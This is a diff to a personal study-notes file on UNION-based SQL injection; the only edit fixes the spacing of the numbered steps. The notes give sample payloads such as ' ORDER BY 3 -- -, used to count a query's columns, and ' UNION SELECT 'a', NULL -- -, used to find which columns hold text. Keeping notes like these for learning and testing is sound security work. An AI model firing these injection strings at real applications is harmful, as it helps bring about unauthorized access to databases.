amalkumar1124/cybersecurity-notes/web-security/sqli.md

 ## Used when the query results are returned directly in the application's response.

-1.Determine Column Count: Increment until an error or change in response occurs:
+1. Determine Column Count: Increment until an error or change in response occurs:

 ' ORDER BY 1 -- -
 ' ORDER BY 2 -- -
 ' ORDER BY 3 -- -  (Error!
 Indicates there are only 2 columns)

-2.Determine Column Data Types: Look for which columns can hold string data:
+2. Determine Column Data Types: Look for which columns can hold string data:

 ' UNION SELECT 'a', NULL -- -
 ' UNION SELECT NULL, 'a' -- -